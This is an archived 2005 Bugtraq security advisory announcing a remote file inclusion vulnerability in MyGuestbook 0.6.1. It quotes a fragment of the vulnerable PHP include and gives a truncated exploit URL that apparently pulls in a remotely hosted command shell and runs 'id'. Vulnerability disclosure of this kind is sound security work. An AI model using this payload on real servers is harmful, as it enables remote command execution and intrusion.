[40305] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Remote File Inclusion in MyGuestbook

daemon@ATHENA.MIT.EDU (rod hedor)
Thu Sep 15 14:17:47 2005

Message-ID: <BAY9-F2363BA83EB53517FD98303C29F0@phx.gbl>
From: "rod hedor" <rodhedor@hotmail.com>
To: bugtraq@securityfocus.com
Date: Wed, 14 Sep 2005 23:50:24 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed


Remote File Inclusion in MyGuestbook

Date: 10/07/2005

Severity: High

version: 0.6.1

The bug reside in form.inc.php3

The Vulnerable Code




if ($show < 1) {
include ("form.inc.php3");
}


Exploit :

http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id


Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

Best Regards

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40305] in bugtraq

Remote File Inclusion in MyGuestbook

daemon@ATHENA.MIT.EDU (rod hedor)Thu Sep 15 14:17:47 2005

daemon@ATHENA.MIT.EDU (rod hedor)
Thu Sep 15 14:17:47 2005